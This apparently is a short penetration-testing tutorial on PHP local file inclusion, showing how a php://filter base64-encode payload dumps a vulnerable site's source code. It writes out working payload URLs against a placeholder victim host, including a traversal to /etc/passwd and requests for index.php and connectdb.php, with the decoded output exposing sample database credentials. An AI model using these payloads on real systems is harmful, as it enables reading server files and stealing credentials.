Many a times during a web application penetration testing, we get to test for various security threats and bugs. This short article will narrate one such experience while penetration testing where we have noticed that many security professionals are not able to understand the situation and leave the work half done. Local file inclusion (short name LFI) is web exploitation technique where files are included on a server through the web browser. This vulnerability mainly occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected.
Sometimes we need to get a glance of the working PHP code of the LFI vulnerable website, it may reveal more secrets to attacker and help in proper exploitation when logs access and /proc/self/environ both fails. The technique uses PHP filter directives .The filter will convert the PHP code into base64 encoding. We have to decode the base64 string to carry out successful exploitation. Take for example, you have a LFI like this:
http://www.victim.com/ index . php ? lfi = ../ ../ ../.. /etc/passwd%00
All you have to do is to change it to:
http://www.victim.com/index.php?lfi=php://filter/read=convert.base64-encode/resource=index.php%00
Let me make it more easier to understand. Suppose, www.victim.com is vulnerable to LFI. The decoding of the following URL :
http://www.victim.com/index.php?lfi=php://filter/read=convert.base64-encode/resource=connectdb.php%00
will reveal this:
PD9waHANCglteXNxbF9jb25uZWN0ICgibG9jYWxob3N0Iiwicm9vdCIsImRiYTEzMzciKTsNCglteXNxbF9zZWxlY3RfZGIoImNvbmZpZGVudGlhbCIpOw0KPz4=
And after decoding , we will get the following:
<?php
mysql_connect (“localhost”,”root”,”dba1337″);
mysql_select_db(“confidential”);
?>
This might look. quite small. But we have noticed that this had been left untouched during many test. We hope this was informative. Stay tuned! 
